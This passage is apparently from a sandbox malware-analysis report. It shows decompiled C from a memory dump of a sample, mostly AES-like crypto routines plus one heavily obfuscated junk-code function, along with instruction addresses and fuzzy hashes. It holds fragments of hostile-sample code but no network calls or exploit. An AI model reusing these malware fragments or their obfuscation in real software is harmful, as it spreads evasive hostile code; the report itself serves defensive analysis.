				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}



















                                                                                                                0x00e55823
                                                                                                                0x00e55832
                                                                                                                0x00e5583b
                                                                                                                0x00e55849
                                                                                                                0x00e5584d
                                                                                                                0x00e55856
                                                                                                                0x00e55867
                                                                                                                0x00e5586a
                                                                                                                0x00e5586f
                                                                                                                0x00e55878
                                                                                                                0x00e55886
                                                                                                                0x00e5588b
                                                                                                                0x00e55894
                                                                                                                0x00e558a4
                                                                                                                0x00e558c4
                                                                                                                0x00e558c7
                                                                                                                0x00e558d9
                                                                                                                0x00e558de
                                                                                                                0x00e558f3
                                                                                                                0x00e55910
                                                                                                                0x00e55913
                                                                                                                0x00e55924
                                                                                                                0x00e55939
                                                                                                                0x00e55959
                                                                                                                0x00e5595c
                                                                                                                0x00e5596e
                                                                                                                0x00e5598c
                                                                                                                0x00e559a9
                                                                                                                0x00e559ac
                                                                                                                0x00e559be
                                                                                                                0x00e559d3
                                                                                                                0x00e559d9
                                                                                                                0x00e559e1
                                                                                                                0x00e559e2
                                                                                                                0x00e559e5
                                                                                                                0x00e559f3
                                                                                                                0x00e55a03
                                                                                                                0x00e55a15
                                                                                                                0x00e55a27
                                                                                                                0x00e55a43
                                                                                                                0x00e55a56
                                                                                                                0x00e55a63
                                                                                                                0x00e55a74
                                                                                                                0x00e55a8b
                                                                                                                0x00e55aad
                                                                                                                0x00e55ab0
                                                                                                                0x00e55ac1
                                                                                                                0x00e55adc
                                                                                                                0x00e55af3
                                                                                                                0x00e55af6
                                                                                                                0x00e55b08
                                                                                                                0x00e55b10
                                                                                                                0x00e55b25
                                                                                                                0x00e55b42
                                                                                                                0x00e55b45
                                                                                                                0x00e55b56
                                                                                                                0x00e55b7a
                                                                                                                0x00e55b8a
                                                                                                                0x00e55b8d
                                                                                                                0x00e55b9f
                                                                                                                0x00e55bb7
                                                                                                                0x00e55bba
                                                                                                                0x00e55bcd
                                                                                                                0x00e55bda
                                                                                                                0x00e55bec
                                                                                                                0x00e55c04
                                                                                                                0x00e55c27
                                                                                                                0x00e55c2a
                                                                                                                0x00e55c3c
                                                                                                                0x00e55c51
                                                                                                                0x00e55c57
                                                                                                                0x00e55c57
                                                                                                                0x00e55c5a
                                                                                                                0x00e55c5a
                                                                                                                0x00e559f3
                                                                                                                0x00e55cbe
                                                                                                                0x00e55cc7
                                                                                                                0x00e55cd5
                                                                                                                0x00e55d33
                                                                                                                0x00e55d3c
                                                                                                                0x00e55d4a
                                                                                                                0x00e55dac
                                                                                                                0x00e55db5
                                                                                                                0x00e55dc2
                                                                                                                0x00e55dc5
                                                                                                                0x00e55e11
                                                                                                                0x00e55e1d
                                                                                                                0x00e55e26
                                                                                                                0x00e55e33
                                                                                                                0x00e55e3a

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                • Instruction ID: e6ed9a3c632e33486758c55f075edac4347ab49b3472c8a6737d5e740bcb19e7
                                                                                                                • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                • Instruction Fuzzy Hash: 29026E73E547164FE720CE4ACDC4765B3A3EFC8311F5B81B8CA142B613CA39BA525A90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E55603 Relevance: .2, Instructions: 165COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 67%
                                                                                                                			E00E55603(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}
















                                                                                                                0x00e55606
                                                                                                                0x00e5560b
                                                                                                                0x00e55613
                                                                                                                0x00e5561c
                                                                                                                0x00e55626
                                                                                                                0x00e5562d
                                                                                                                0x00e55636
                                                                                                                0x00e55641
                                                                                                                0x00e55649
                                                                                                                0x00e55652
                                                                                                                0x00e5565d
                                                                                                                0x00e55663
                                                                                                                0x00e55668
                                                                                                                0x00e55671
                                                                                                                0x00e5567c
                                                                                                                0x00e55684
                                                                                                                0x00e5568d
                                                                                                                0x00e55698
                                                                                                                0x00e556a0
                                                                                                                0x00e556a9
                                                                                                                0x00e556b4
                                                                                                                0x00e556bc
                                                                                                                0x00e556c5
                                                                                                                0x00e556d0
                                                                                                                0x00e556d8
                                                                                                                0x00e556e1
                                                                                                                0x00e556f3
                                                                                                                0x00e556f6
                                                                                                                0x00e55812
                                                                                                                0x00e55817
                                                                                                                0x00e556fc
                                                                                                                0x00e556fc
                                                                                                                0x00e556ff
                                                                                                                0x00e55701
                                                                                                                0x00e55704
                                                                                                                0x00e55704
                                                                                                                0x00e55769
                                                                                                                0x00e5576e
                                                                                                                0x00e55770
                                                                                                                0x00e55776
                                                                                                                0x00e55778
                                                                                                                0x00e5577e
                                                                                                                0x00e55780
                                                                                                                0x00e55783
                                                                                                                0x00e55789
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00e557e5
                                                                                                                0x00e557eb
                                                                                                                0x00e557ed
                                                                                                                0x00e557f3
                                                                                                                0x00e557f5
                                                                                                                0x00e557fa
                                                                                                                0x00e557fb
                                                                                                                0x00e557fe
                                                                                                                0x00e55801
                                                                                                                0x00e55804
                                                                                                                0x00e5580a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00e5580a
                                                                                                                0x00e55821
                                                                                                                0x00e55821
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                • Instruction ID: a63a59d9e7dfae5657de39d3a1293fa37dd978440410cb003728a2f21c58ed6b
                                                                                                                • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                • Instruction Fuzzy Hash: E85180B3E14A214BD3188E09CC50631B792FFC8312B5F81BADD199B357CA74E9529A90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E729E4 Relevance: .2, Instructions: 163COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 43%
                                                                                                                			E00E729E4(signed int __eax, signed int __ebx, signed int __ecx, signed char __edx, signed int __esi) {
				char _v3;
				signed int _t24;
				void* _t26;
				signed char _t31;
				signed int _t33;
				signed int _t57;
				signed int _t71;
				void* _t73;

				_t57 = __esi;
				_t45 = __edx;
				_t38 = __ecx;
				_t33 = __ebx;
				_t24 = __eax;
				goto L1;
				do {
					do {
						do {
							do {
								do {
									do {
										L1:
										_t33 = _t33 ^  *0x939ff7b7;
										_t73 =  *0x8f83e7b0 - _t38;
									} while (_t73 == 0);
									asm("sbb [0xc419e217], esi");
									asm("sbb esi, [0x84e5c4bb]");
								} while (_t73 != 0);
								asm("rcl dword [0xdd634e75], 0x9a");
								asm("adc [0xaeb00218], cl");
							} while (_t73 >= 0);
							asm("adc ecx, [0xe77cd173]");
							asm("lodsb");
							asm("adc edi, [0xef4544a1]");
							 *0x2f9d1616 =  *0x2f9d1616 | _t57;
							asm("sbb dl, [0xc1ddbd1c]");
							asm("sbb dl, 0x32");
							_t33 = _t33 -  *0xefa8e0cc;
							 *0x85c02c16 =  *0x85c02c16 >> 0x92;
							 *0xb2efca25 =  *0xb2efca25 ^ _t71;
							 *0xa8e0cc32 =  *0xa8e0cc32 + _t45;
							_pop( *0xc1daa919);
							 *0xa8e0cc32 =  *0xa8e0cc32 >> 0xcf;
						} while (( *0xc83916ef & _t33) != 0);
						 *0xd8a8c4a8 =  *0xd8a8c4a8 | _t24;
						_t71 =  *0x997775 & 0x8b7a16ef;
						asm("ror dword [0xc68ff209], 0xad");
						 *0x3816efa8 =  *0x3816efa8 >> 0xa6;
						_push(_t45);
						_push(_t24 + 1);
						 *0xef45d88d =  *0xef45d88d >> 0x40;
						 *0x81d04116 = _t57 | 0x173a7bc8;
						_t38 = 0x3a;
						asm("adc ecx, [0x50405217]");
						_push( *0xef45d88d);
						 *0x81c42916 =  *0x81c42916 - 0x3a;
						asm("adc ah, 0x3a");
						 *0x50405217 =  *0x50405217 << 0xec;
						_t57 =  *0x81d04116 &  *0xef45d88d;
						asm("rcl dword [0x9cba1d16], 0x78");
						_pop(_t26);
						_t24 = _t26 - 0xb4;
						 *0x8daddd0f =  *0x8daddd0f ^ 0x0000003a;
						asm("scasb");
						_push(0xe0cc32c1);
						asm("sbb esi, 0x32ee16ef");
						asm("rcr dword [0x1db40ffd], 0x25");
						_t45 = (_t45 & 0x000000e7) - 0xe0cc3283;
						asm("adc bl, 0xa8");
						asm("rcr dword [0x6d2b16ef], 0x1a");
						asm("rcl byte [0xefbe0b1c], 0x18");
						asm("adc ebx, [0xbe17ff2f]");
						asm("ror byte [0x16efa8e0], 0x32");
						 *0x2b7093ff =  *0x2b7093ff & _t24;
						asm("adc [0xfa34f216], esp");
						 *0xa8e0cc32 =  *0xa8e0cc32 - _t45;
						_t33 = _t33 -  *0x32c5f7c6 & 0xc62116ef;
						asm("adc ch, 0xb3");
						asm("adc eax, [0xd601ee67]");
						asm("sbb ebp, [0x49395fc0]");
						asm("rcr byte [0xa2f716d2], 0xd7");
					} while (_t33 <= 0);
					asm("rcr dword [0x395f828e], 0x3d");
					 *0x36b616d2 =  *0x36b616d2 ^ 0x39;
					 *0xebb8140b =  *0xebb8140b << 0x9c;
					 *0xa816efa8 = _t24;
					asm("scasb");
					asm("adc ebx, 0x9e8e16ef");
					 *0xe0cc32c1 = _t57;
					 *0xba16efa8 =  *0xba16efa8 & 0xce9d8d8c;
					asm("adc al, [0xaf869af2]");
					asm("cmpsw");
					 *0xbed3f5bd =  *0xbed3f5bd << 0xe3;
					asm("adc [0x16d24939], esi");
					asm("rcl dword [0xa4071c62], 0x1d");
					 *0xcc32c1db =  *0xcc32c1db >> 0x8f;
					 *0xfe16efa8 = 0x39;
					_t33 = _t33 -  *0x16d24939 -  *0x9a7c73a2;
					 *0x45d8a8c4 =  *0x45d8a8c4 + ( *0xa816efa8 - 0x000000e0 & 0x000000a8);
					_t24 =  *0xf4be16ef;
					_t38 =  *0x49395fa8;
					 *0x49395fa8 =  *0xfe16efa8 & 0x99d1b49b;
					_t57 = _t57 |  *0x33947a16;
					_t45 = 0xc1dec32e;
					asm("sbb ah, [0xa8e0cc32]");
					asm("adc dl, [0xccecc9b4]");
					asm("adc edi, [0x49395fc2]");
					asm("ror byte [0xc48616d2], 0x93");
					asm("adc esi, 0xe0cc32c1");
					 *0x16efa8 =  *0x16efa8 | _t24;
					 *0x704b93b7 =  *0x704b93b7 >> 0x50;
					asm("lodsb");
					asm("scasd");
					asm("ror dword [0x16d24939], 0x4a");
					 *0xaddd0fb4 =  *0xaddd0fb4 - _t38;
					_push( *0xef45d88d);
					 *0x90e04c16 =  *0x90e04c16 - _t71;
				} while ( *0x90e04c16 > 0);
				_t31 = _t24 &  *0xa8008977;
				 *0xf9e2bc0 =  *0xf9e2bc0 - (_t38 ^  *0x45d8a8c4);
				 *0x8f16ef88 =  *0x8f16ef88 | _t31;
				asm("ror dword [0x826380d6], 0xa1");
				asm("rol byte [0xd8a8c4a8], 0x16");
				 *0x121f16ef =  *0x121f16ef >> 9;
				 *0x5fc2ccf0 =  &_v3 +  *0x40ecb2a1;
				asm("sbb edx, [0x2e339416]");
				return _t31;
			}











                                                                                                                0x00e729e4
                                                                                                                0x00e729e4
                                                                                                                0x00e729e4
                                                                                                                0x00e729e4
                                                                                                                0x00e729e4
                                                                                                                0x00e729e5
                                                                                                                0x00e729e7
                                                                                                                0x00e729e7
                                                                                                                0x00e729e7
                                                                                                                0x00e729e7
                                                                                                                0x00e729e7
                                                                                                                0x00e729e7
                                                                                                                0x00e729e7
                                                                                                                0x00e729e7
                                                                                                                0x00e729ed
                                                                                                                0x00e729ed
                                                                                                                0x00e729fa
                                                                                                                0x00e72a00
                                                                                                                0x00e72a00
                                                                                                                0x00e72a09
                                                                                                                0x00e72a10
                                                                                                                0x00e72a10
                                                                                                                0x00e72a18
                                                                                                                0x00e72a1e
                                                                                                                0x00e72a1f
                                                                                                                0x00e72a25
                                                                                                                0x00e72a2b
                                                                                                                0x00e72a31
                                                                                                                0x00e72a34
                                                                                                                0x00e72a3a
                                                                                                                0x00e72a41
                                                                                                                0x00e72a47
                                                                                                                0x00e72a54
                                                                                                                0x00e72a5a
                                                                                                                0x00e72a61
                                                                                                                0x00e72a73
                                                                                                                0x00e72a7a
                                                                                                                0x00e72a80
                                                                                                                0x00e72a8d
                                                                                                                0x00e72a9a
                                                                                                                0x00e72a9c
                                                                                                                0x00e72a9d
                                                                                                                0x00e72aa4
                                                                                                                0x00e72aaa
                                                                                                                0x00e72aac
                                                                                                                0x00e72ab2
                                                                                                                0x00e72ab8
                                                                                                                0x00e72abe
                                                                                                                0x00e72ac1
                                                                                                                0x00e72ac8
                                                                                                                0x00e72ace
                                                                                                                0x00e72ad5
                                                                                                                0x00e72ad6
                                                                                                                0x00e72ad9
                                                                                                                0x00e72ae5
                                                                                                                0x00e72aec
                                                                                                                0x00e72af6
                                                                                                                0x00e72afc
                                                                                                                0x00e72b03
                                                                                                                0x00e72b09
                                                                                                                0x00e72b0c
                                                                                                                0x00e72b13
                                                                                                                0x00e72b26
                                                                                                                0x00e72b32
                                                                                                                0x00e72b39
                                                                                                                0x00e72b4b
                                                                                                                0x00e72b57
                                                                                                                0x00e72b5d
                                                                                                                0x00e72b63
                                                                                                                0x00e72b66
                                                                                                                0x00e72b6c
                                                                                                                0x00e72b72
                                                                                                                0x00e72b72
                                                                                                                0x00e72b85
                                                                                                                0x00e72b8d
                                                                                                                0x00e72b93
                                                                                                                0x00e72ba0
                                                                                                                0x00e72bae
                                                                                                                0x00e72bb5
                                                                                                                0x00e72bc1
                                                                                                                0x00e72bc7
                                                                                                                0x00e72bcd
                                                                                                                0x00e72bf7
                                                                                                                0x00e72bf9
                                                                                                                0x00e72c01
                                                                                                                0x00e72c0a
                                                                                                                0x00e72c11
                                                                                                                0x00e72c1b
                                                                                                                0x00e72c21
                                                                                                                0x00e72c2d
                                                                                                                0x00e72c33
                                                                                                                0x00e72c41
                                                                                                                0x00e72c41
                                                                                                                0x00e72c4a
                                                                                                                0x00e72c50
                                                                                                                0x00e72c56
                                                                                                                0x00e72c65
                                                                                                                0x00e72c6b
                                                                                                                0x00e72c71
                                                                                                                0x00e72c7e
                                                                                                                0x00e72c84
                                                                                                                0x00e72c8a
                                                                                                                0x00e72c91
                                                                                                                0x00e72c94
                                                                                                                0x00e72c96
                                                                                                                0x00e72ca3
                                                                                                                0x00e72ca9
                                                                                                                0x00e72caf
                                                                                                                0x00e72caf
                                                                                                                0x00e72cbb
                                                                                                                0x00e72ccd
                                                                                                                0x00e72cd9
                                                                                                                0x00e72cdf
                                                                                                                0x00e72ce9
                                                                                                                0x00e72cf1
                                                                                                                0x00e72d10
                                                                                                                0x00e72d1c
                                                                                                                0x00e72d22

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: baccb80e81f64dee43b01be8251fb4b1c90325099889ace9cb644f6aef7c5aa1
                                                                                                                • Instruction ID: 43c00c71949070f53f16acd3aa405930ae815c87d928859bd4c27130bd651586
                                                                                                                • Opcode Fuzzy Hash: baccb80e81f64dee43b01be8251fb4b1c90325099889ace9cb644f6aef7c5aa1
                                                                                                                • Instruction Fuzzy Hash: 8481F0328493D1DFEB05CF38E89A7863F75E786320B48478DC9A2575D2D760156ACB81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E555FA Relevance: .2, Instructions: 163COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 62%
                                                                                                                			E00E555FA(void* __eax, intOrPtr _a4, signed int* _a12, signed int* _a16, intOrPtr _a20) {
				signed int _t69;
				signed int* _t76;
				signed int* _t89;
				signed int _t102;
				signed int _t104;
				signed int _t114;
				signed int _t116;
				signed int* _t118;
				signed int _t135;
				signed int _t137;
				signed int _t141;
				signed int _t162;
				intOrPtr _t184;

				asm("out dx, eax");
				asm("cli");
				_t89 = _a16;
				_t118 = _a12;
				_push(0xec8b556a);
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t118 =  *_t89 & 0xff00ff00 |  *_t89 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[1] = _t89[1] & 0xff00ff00 | _t89[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[2] = _t89[2] & 0xff00ff00 | _t89[2] & 0x00ff00ff;
				_t69 =  &(_t118[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[3] = _t89[3] & 0xff00ff00 | _t89[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[4] = _t89[4] & 0xff00ff00 | _t89[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[5] = _t89[5] & 0xff00ff00 | _t89[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[6] = _t89[6] & 0xff00ff00 | _t89[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t118[7] = _t89[7] & 0xff00ff00 | _t89[7] & 0x00ff00ff;
				if(_a20 != 0x100) {
					L5:
					return _t69 | 0xffffffff;
				} else {
					_t184 = _a4;
					_t76 = 0;
					_a12 = 0;
					while(1) {
						_t162 =  *(_t69 + 0x18);
						_t102 = ( *(_t184 + 4 + (_t162 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t184 +  &(_t76[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t184 + 4 + (_t162 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t184 + 5 + (_t162 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t184 + 4 + (_t162 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t69 - 4);
						_t135 =  *_t69 ^ _t102;
						 *(_t69 + 0x1c) = _t102;
						_t104 =  *(_t69 + 4) ^ _t135;
						 *(_t69 + 0x20) = _t135;
						_t137 =  *(_t69 + 8) ^ _t104;
						 *(_t69 + 0x24) = _t104;
						 *(_t69 + 0x28) = _t137;
						if(_t76 == 6) {
							break;
						}
						_t114 = ( *(_t184 + 4 + (_t137 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t184 + 4 + (_t137 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t184 + 4 + (_t137 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t184 + 5 + (_t137 & 0x000000ff) * 4) & 0x000000ff ^  *(_t69 + 0xc);
						_t141 =  *(_t69 + 0x10) ^ _t114;
						 *(_t69 + 0x2c) = _t114;
						_t116 =  *(_t69 + 0x14) ^ _t141;
						 *(_t69 + 0x34) = _t116;
						_t76 =  &(_a12[0]);
						 *(_t69 + 0x30) = _t141;
						 *(_t69 + 0x38) = _t116 ^ _t162;
						_t69 = _t69 + 0x20;
						_a12 = _t76;
						if(_t76 < 7) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					return 0xe;
				}
				L7:
			}
















                                                                                                                0x00e555fb
                                                                                                                0x00e555fc
                                                                                                                0x00e55606
                                                                                                                0x00e5560b
                                                                                                                0x00e5560e
                                                                                                                0x00e55613
                                                                                                                0x00e5561c
                                                                                                                0x00e55626
                                                                                                                0x00e5562d
                                                                                                                0x00e55636
                                                                                                                0x00e55641
                                                                                                                0x00e55649
                                                                                                                0x00e55652
                                                                                                                0x00e5565d
                                                                                                                0x00e55663
                                                                                                                0x00e55668
                                                                                                                0x00e55671
                                                                                                                0x00e5567c
                                                                                                                0x00e55684
                                                                                                                0x00e5568d
                                                                                                                0x00e55698
                                                                                                                0x00e556a0
                                                                                                                0x00e556a9
                                                                                                                0x00e556b4
                                                                                                                0x00e556bc
                                                                                                                0x00e556c5
                                                                                                                0x00e556d0
                                                                                                                0x00e556d8
                                                                                                                0x00e556e1
                                                                                                                0x00e556f3
                                                                                                                0x00e556f6
                                                                                                                0x00e55810
                                                                                                                0x00e55817
                                                                                                                0x00e556fc
                                                                                                                0x00e556fc
                                                                                                                0x00e556ff
                                                                                                                0x00e55701
                                                                                                                0x00e55704
                                                                                                                0x00e55704
                                                                                                                0x00e55769
                                                                                                                0x00e5576e
                                                                                                                0x00e55770
                                                                                                                0x00e55776
                                                                                                                0x00e55778
                                                                                                                0x00e5577e
                                                                                                                0x00e55780
                                                                                                                0x00e55783
                                                                                                                0x00e55789
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00e557e5
                                                                                                                0x00e557eb
                                                                                                                0x00e557ed
                                                                                                                0x00e557f3
                                                                                                                0x00e557f5
                                                                                                                0x00e557fa
                                                                                                                0x00e557fb
                                                                                                                0x00e557fe
                                                                                                                0x00e55801
                                                                                                                0x00e55804
                                                                                                                0x00e5580a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00e5580a
                                                                                                                0x00e55821
                                                                                                                0x00e55821
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
